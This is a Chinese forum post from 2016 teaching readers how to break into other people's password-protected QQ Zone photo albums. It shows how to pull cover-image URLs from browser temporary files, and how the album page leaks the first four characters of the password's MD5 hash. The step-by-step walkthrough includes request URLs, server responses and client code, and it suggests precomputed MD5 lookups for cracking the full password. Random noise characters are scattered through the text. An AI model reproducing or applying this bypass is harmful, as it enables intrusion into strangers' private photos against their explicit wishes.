|
|
现在很多人都拥有QQ空间,并且上传了自己的照片。当你想看看新朋友的庐山真面目,可惜给相册加了密码。是不是很扫兴,现在就教你破解掉这个密码来观看加密相册。
1 G# c6 K/ G1 \8 H9 r4 D1 ?" c7 H g
首先打开一个已经加过密的QQ空间相册页面,然后打开IE“工具-internet-选项”,在“常规”中的“internet临时文件夹”下,依次选择删除“cookies”和“删除文件”删除临时文件夹中所有的cookies和文件,然后再点击“设置”,在“设置窗口”选择“查看文件”,这样就打开了IE临时文件夹。
, d( y( w u4 |0 P2 E: g+ R4 C" ?1 d" q6 F# D* G
然后打开需要破解的加密相册,出现一个对话框需要输入密码,这是选择取消,在刷新一下空间,点击“相册”。作完上面的动作后找到临时文件夹,刷新一下,里面会有一个“cgi_qqzone_static”的XML文档。双击打开它,在弹出的对话框中选择“是”,打开的是一个代码文件。按Ctrl+f查找,输入“我”进行查找,找到<![CDATA[ 我 ]]>这段代码,下面那个地址就是QQ相册的封面地址。复制他就能看到加密图片的封面
0 ]9 n7 e( e3 ~1 ~+ j! c5 Y' L根据http://izone.qq.com/client/photo ... &album=31931732
/ \( {+ L, |* U9 A: r下载或者翻看Internet临时文件夹下的 photo_password 文件可查到下列语句:
2 l. |; D) \8 b6 Gtype="text/JavaScript" src=https://www.abc369.net/info/way/"/js/md5.js"></script> 5 h9 _' O. y! B4 f& h) A" V, \% R
document.cookie=("album"+albumId+"pwd="+hex_md5(pwd));
" B0 O) @/ I* R9 L对比 md5.js文件可知,此v2.1版本的 JavaScript MD5,且输入的密码转化为32位的字符串。
/ b5 G+ ^) x. h# u' J7 ]( i- s8 ^* M2 z, J5 ?/ J
比较两个地址:
" w5 g1 W4 q& F1 Uhttp://photo.qq.com/cgi-bin/izon ... mp;albumid=31931732 % h8 j1 W# U9 S" [
/*http://izone.qq.com/client/photo ... amp;album=31931732/这个地址类似可以不看*/ ( Z0 a i6 R; d9 Q! n! h
(此地址为有密码情况下的登陆地址,要求输入密码)
0 O& T/ G5 T2 W% ghttp://photo.qq.com/cgi-bin/izon ... asswd=&mode=big
' h) U5 ^( I% e(此地址为无密码情况下的登陆地址) % x1 X) s% X9 J7 i2 |
0 t) A; Q1 V( O- ~' p由此可以推断出: 3 a0 s8 P" E0 Z
http://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big
$ `# i1 I9 q' p. X1 M广告广告为转化后的md5字符串,此地址应该为此地址为有密码情况下的直接登陆地址。 + s9 ]$ z* K9 A2 p; k1 Y5 x& z
随便输入一段字符显示如下: 9 e7 i& L/ K. v0 H
<?xml version="1.0" encoding="GBK" ?>
- U7 U7 Q) [: u/ F% U$ W K0 i# F<error>密码有误,请重新输入!</error> 0 f3 @% \. p# n4 @: T
考虑到在前面有密码情况下的登陆窗口连接为cgi_album_pwd,浏览相册连接为cgi_album_view。 + t. S( ?/ k; F
试将登陆地址改为下列方式:
, x5 C6 L& t$ A0 n& qhttp://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big
& ~2 U. }! v$ o3 F随便输入一段字符显示如下: ( ^9 ?7 P# _0 h: l% H7 v. v) ~
<?xml version="1.0" encoding="GBK" ?> % ^% J) H) D9 N
<data id="31931732" owner="23266229" passwd="81dc" /> # e! R l: Y/ N
经过换算可知,1234的MD5值是81dc9bdb52d04dc20036dbd8313ed055 9 z6 q) J8 b# G4 m \3 H
测试数次
& u5 A& F* R' w0 Z( u! k' Z" L8 }<?xml version="1.0" encoding="GBK" ?>
3 P: }; t% q# f+ ^<data id="31931732" owner="23266229" passwd="1bbd" />
' V5 d& m# g" n5 q4 w密码:11111111 MD5:1bbd886460827015e5d605ed44252251
$ L: _5 c, U% V& T$ ~<?xml version="1.0" encoding="GBK" ?>
$ H1 E, C- Y6 M$ w<data id="31931732" owner="23266229" passwd="eccb" /> z {6 U5 g& G6 F4 K
密码:3 MD5:eccbc87e4b5ce2fe28308fd9f2a7baf3
* D+ o) N0 R. y% |, p由此可以判断,此处的passwd为密码加密后的前4位。 1 B/ H: j; y# \0 h$ t( U! Z5 q9 A
photo_password 文件可查到下列语句:
! X% S7 x( S3 r1 b6 E9 V* vvar p=""; & D5 g3 p, D- Q
if (x!=null) p=x.selectSingleNode("/data").getAttribute("passwd"); / k7 F( Z/ [, D9 O' G
判断此passwd应该是数据库中的某字段名。 8 _7 D- A9 C) j2 }$ u
if (p!="" && hex_md5(pwd).indexOf(p)!=0){ ) P/ C- P1 Y( {5 J: @
alert("密码错误") % j8 j/ {4 F9 Y$ f5 K- [
document.getElementById("pass").focus();
1 _% U$ X7 `7 |+ }1 D) N2 R& u/ jreturn;
' v2 _7 U8 r4 P8 @* N} 6 i& I& P3 X0 T! g$ x! P# T" t
document.cookie=("album"+albumId+"pwd="+hex_md5(pwd)); / J$ S C0 |; [9 V6 [' j, A
location="/client/photo_static_big.htm?uin="+uin+"&album="+albumId; , {0 O2 a& A! D. L
pwd为输入的密码,经过md5加密。判断此处出现的passwd="eccb"应该是验证输入的密文密码的正确性的。如果正确,使用hex_md5(pwd)进行登陆。 , v- o1 m( X% n: F
& |9 j/ ?/ i% y由于qq相册密码提示为8位,那么如果有心人使用相关工具换算处8位以下的所有数字和字母组合的MD5值做成数据库,那么密码就如同虚设。但是考虑到相册密码意义不大,一般情况下不会有人过于无聊拿机器去跑这东西... 似乎最基本常见的的运算次数为几百万亿次,如果谁又兴趣搞几台服务器跑天把做个数据库倒是蛮好,就是大了点准备个TB级的硬盘矩阵吧。如果怕麻烦可以去国外的几个大型MD5数据库查询: ?$ N$ T4 b: b
|
|
|手机版|小黑屋|☆我要吧☆
( 豫ICP备13016831号-1 )
狗仔卡
发表于 2016-4-6 22:05:08
提升卡
置顶卡
锁贴卡
解贴卡
变色卡
显身卡